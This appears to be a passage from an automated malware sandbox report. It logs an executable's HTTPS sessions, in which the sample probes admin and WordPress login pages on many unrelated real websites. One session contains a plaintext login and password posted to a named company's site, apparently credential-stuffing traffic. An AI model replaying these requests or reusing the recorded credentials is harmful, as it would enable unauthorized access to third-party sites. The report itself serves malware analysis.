                                                                                                                                                                                                    2023-11-26 06:00:00 UTC13597INData Raw: 33 35 31 35 0d 0a 65 6e 74 2e 63 6f 6d 2f 76 61 63 61 74 75 72 65 73 2f 76 61 63 61 74 75 72 65 5f 70 72 6f 64 75 63 74 69 6f 6e 5f 6d 61 6e 61 67 65 72 5f 64 65 5f 6b 75 79 70 65 72 5f 38 32 30 34 31 30 5f 31 31 2e 68 74 6d 6c 22 3e 50 72 6f 64 75 63 74 69 6f 6e 20 4d 61 6e 61 67 65 72 20 2f 20 44 65 20 4b 75 79 70 65 72 3c 2f 61 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 09 0a 09 09 0a 09 09 0a 09 09 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 6f 6f 6b 49 74 65 6d 57 6f 72 64 20 6a 73 6c 4b 65 79 77 6f 72 64 20 6a 73 6c 4c 6f 63 61 74 69 6f 6e 22 3e 0a 09 09 09 3c 73 70 61 6e 3e 69 6e 3c 21 2d 2d 53 69 6e 67 6c 65 57 6f 72 64 4c 69 6e 6b 31 2d 2d 3e 3c 2f 73 70 61 6e 3e 56 65 72 74 72 6f 75 77 65 6c 69 6a 6b 0a 09 09 3c 2f 64 69 76 3e 0a 09 09 0a 09 09 0a
                                                                                                                                                                                                    Data Ascii: 3515ent.com/vacatures/vacature_production_manager_de_kuyper_820410_11.html">Production Manager / De Kuyper</a></div><div class="hookItemWord jslKeyword jslLocation"><span>in...SingleWordLink1--></span>Vertrouwelijk</div>
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    556192.168.2.45631718.228.96.1424436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC184OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.rechagricola.com.br
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC440INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 72 65 63 68 2e 63 6f 6d 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6f 72 69 67 69 6e 44 69 72 65 63 74 3d 74 72 75 65 3b 20 4d 61 78 2d 41 67 65 3d 36 30 34 38 30 30 3b 20 45 78 70 69 72 65 73 3d 53 75 6e 2c 20 30 33 20 44 65 63 20 32 30 32 33 20 30 36 3a 30 30 3a 30 30 20 47 4d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 06:00:00 GMTContent-Length: 0Connection: closeContent-Security-Policy: frame-ancestors 'self'Location: https://rech.comSet-Cookie: originDirect=true; Max-Age=604800; Expires=Sun, 03 Dec 2023 06:00:00 GM


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    557192.168.2.4563043.111.240.64436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC168OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                    Host: knu.ac.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC215INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 6e 75 2e 61 63 2e 69 6e 2f 61 64 6d 69 6e 2e 70 68 70 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 39 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 06:00:00 GMTServer: ApacheLocation: https://www.knu.ac.in/admin.phpContent-Length: 299Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC299INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 6e 75 2e 61 63 2e 69 6e 2f 61 64 6d 69 6e 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.knu.ac.in/admin.php">here</a>.</p><hr><address>Apache Server at


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    558192.168.2.456353144.202.62.1314436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC356OUTPOST /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: gruporegiosafety.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP%20Cookie%20check
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://gruporegiosafety.com/wp-login.php
                                                                                                                                                                                                    Content-Length: 164
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC164OUTData Raw: 6c 6f 67 3d 63 6f 6d 70 72 61 73 25 34 30 67 72 75 70 6f 72 65 67 69 6f 73 61 66 65 74 79 2e 63 6f 6d 26 70 77 64 3d 43 6f 6d 70 72 61 73 47 52 53 32 30 32 33 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 41 63 63 65 64 65 72 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 67 72 75 70 6f 72 65 67 69 6f 73 61 66 65 74 79 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=compras%40gruporegiosafety.com&pwd=ComprasGRS2023&rememberme=forever&wp-submit=Acceder&redirect_to=https%3A%2F%2Fgruporegiosafety.com%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC492INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 25 32 30 43 6f 6f 6b 69 65 25 32 30 63 68 65 63 6b 3b 20 70 61 74 68 3d 2f 3b 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 06:00:00 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/;
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC7700INData Raw: 32 39 34 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 4d 58 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 41 63 63 65 64 65 72 20 26 6c 73 61 71 75 6f 3b 20 47 52 55 50 4f 20 52 45 47 49 4f 20 53 41 46 45 54 59 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 2e 6c 6f 67 69 6e 2d 61 63 74 69 6f 6e 2d 6c 6f 73 74 70 61 73 73 77 6f 72 64 20 23 6c 6f 67 69 6e 5f 65 72 72 6f 72 7b 0a 20 20
                                                                                                                                                                                                    Data Ascii: 2948<!DOCTYPE html><html lang="es-MX"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Acceder &lsaquo; GRUPO REGIO SAFETY &#8212; WordPress</title> <style> .login-action-lostpassword #login_error{
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC2874INData Raw: 72 61 6e 73 6c 61 74 69 6f 6e 73 2e 6c 6f 63 61 6c 65 5f 64 61 74 61 5b 20 64 6f 6d 61 69 6e 20 5d 20 7c 7c 20 74 72 61 6e 73 6c 61 74 69 6f 6e 73 2e 6c 6f 63 61 6c 65 5f 64 61 74 61 2e 6d 65 73 73 61 67 65 73 3b 0a 09 6c 6f 63 61 6c 65 44 61 74 61 5b 22 22 5d 2e 64 6f 6d 61 69 6e 20 3d 20 64 6f 6d 61 69 6e 3b 0a 09 77 70 2e 69 31 38 6e 2e 73 65 74 4c 6f 63 61 6c 65 44 61 74 61 28 20 6c 6f 63 61 6c 65 44 61 74 61 2c 20 64 6f 6d 61 69 6e 20 29 3b 0a 7d 20 29 28 20 22 64 65 66 61 75 6c 74 22 2c 20 7b 22 74 72 61 6e 73 6c 61 74 69 6f 6e 2d 72 65 76 69 73 69 6f 6e 2d 64 61 74 65 22 3a 22 32 30 32 33 2d 31 31 2d 31 30 20 31 37 3a 31 38 3a 34 37 2b 30 30 30 30 22 2c 22 67 65 6e 65 72 61 74 6f 72 22 3a 22 47 6c 6f 74 50 72 65 73 73 5c 2f 34 2e 30 2e 30 2d 61 6c
                                                                                                                                                                                                    Data Ascii: ranslations.locale_data[ domain ] || translations.locale_data.messages;localeData[""].domain = domain;wp.i18n.setLocaleData( localeData, domain );} )( "default", {"translation-revision-date":"2023-11-10 17:18:47+0000","generator":"GlotPress\/4.0.0-al
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    559192.168.2.45635166.235.200.1474436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC259OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                    Host: tradeavenida.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: _cfuvid=hY8Vy7VtT12kDq0RfaLK5NeJRfcW.qBPudtlDQAWA4k-1700978399347-0-604800000
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC550INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 74 72 61
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 06:00:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://tra
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    560192.168.2.456307120.88.73.2384436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC182OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: my.calvary.qld.edu.au
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC530INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 67 68 33 66 6f 64 6e 6b 74 6c 63 67 34 65 69 32 6e 33 67 6f 32 73 72 33 75 36 3b 20 65 78 70 69 72 65 73 3d 53 75 6e 2c 20 32 36 2d 4e 6f 76 2d 32 30 32 33 20 30 37 3a 30 30 3a 30 30 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 33 36 30 30 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 45 78 70 69 72 65 73
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundServer: nginxDate: Sun, 26 Nov 2023 06:00:00 GMTTransfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=gh3fodnktlcg4ei2n3go2sr3u6; expires=Sun, 26-Nov-2023 07:00:00 GMT; Max-Age=3600; path=/; secure; HttpOnlyExpires
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    561192.168.2.456364162.241.62.2204436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC248OUTGET /wp-login.php?redirect_to=https%3A%2F%2Flumaruniformes.com%2Fwp-admin%2F&reauth=1 HTTP/1.1
                                                                                                                                                                                                    Host: lumaruniformes.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC162INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 39 20 43 6f 6e 66 6c 69 63 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 38 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 409 ConflictDate: Sun, 26 Nov 2023 06:00:00 GMTServer: ApacheContent-Length: 83Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC83INData Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                    Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    562192.168.2.456379162.250.126.54436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC180OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: mydirectlender.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC508INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 63 6c 2d 62 79 70 61 73 73 2d 63 61 63 68 65 3d 79 65 73 3b 20 45 78 70 69 72 65 73 3d 53 75 6e 2c 20 32 36 2d 4e 6f 76 2d 32 33 20 30 36 3a 35 39 3a 35 39 20 47 4d 54 3b 20 44 6f 6d 61 69 6e 3d 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63 6f 6d 3b 20 50 61 74 68 3d 2f 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeSet-Cookie: cl-bypass-cache=yes; Expires=Sun, 26-Nov-23 06:59:59 GMT; Domain=mydirectlender.com; Path=/; HttpOnly; SameSite=Lax
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC15876INData Raw: 34 66 64 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 61 70 74 63 68 61 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 0a 20 20 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 36 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 0a 20 20 20 20 20 20 20 20 20 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 33 38 34 2d 31 71 38 6d 54 4a 4f 41 53 78 38 6a 31
                                                                                                                                                                                                    Data Ascii: 4fd0<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Captcha</title> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" integrity="sha384-1q8mTJOASx8j1
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC4569INData Raw: 37 31 31 35 39 20 32 38 2e 39 39 37 32 32 33 32 2c 32 39 2e 33 34 38 39 32 30 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 46 69 6c 6c 2d 31 32 22 20 66 69 6c 6c 3d 22 23 34 36 37 43 34 35 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 34 2e 39 37 31 33 33 39 30 32 2c 32 35 2e 36 34 35 35 35 20 43 39 2e 39 33 33 38 35 31 32 32 2c 32 37 2e 31 38 37 33 37 39 33 20 31 34 2e 37 37 33 37 30 34 39 2c 32 39 2e 30 33 36 34 32 38 20 31 39 2e 36 37 34 38 38 37 38 2c 33 30 2e 36 37 30 35 33 37 38 20 43 32 30 2e 34 31 34 38 35 31 32 2c 33 30 2e 39 31 37 30 30 31 32 20 32 31 2e 31 35 34 32 34 31 35 2c 33 31 2e 31 39 34 34 31 35 39 20 32 31 2e
                                                                                                                                                                                                    Data Ascii: 71159 28.9972232,29.3489207" id="Fill-12" fill="#467C45"></path> <path d="M4.97133902,25.64555 C9.93385122,27.1873793 14.7737049,29.036428 19.6748878,30.6705378 C20.4148512,30.9170012 21.1542415,31.1944159 21.


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    563192.168.2.45634695.168.220.2104436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC218OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: www.beachrecruitment.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: OF=v9cu3s0m473ercltrbqt6cbio0
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC535INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 74 72 61 6e 73 66 65 72 2d 65 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 6b 38 73 70 65 72 73 69 73 74 65 6e 74 3d 64 62 63 65 30 34 33 66 64 35 37 37 33 65 34 36 31 31 35 39 30 35 63 66 31 61 36 39 39 32 62 38 7c 31 31 66 31 38 37 36 33 38 36 34 33 65 31 33 64 37 62 64 31 39 36 33 39 39 31 66 61 63 35 32 62 3b 20 45 78 70 69 72 65 73 3d 54 75 65 2c 20 32 38 2d 4e 6f 76 2d 32 33 20 30 36 3a 30 30 3a 30 30 20 47
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not Founddate: Sun, 26 Nov 2023 06:00:00 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedset-cookie: k8spersistent=dbce043fd5773e46115905cf1a6992b8|11f187638643e13d7bd1963991fac52b; Expires=Tue, 28-Nov-23 06:00:00 G
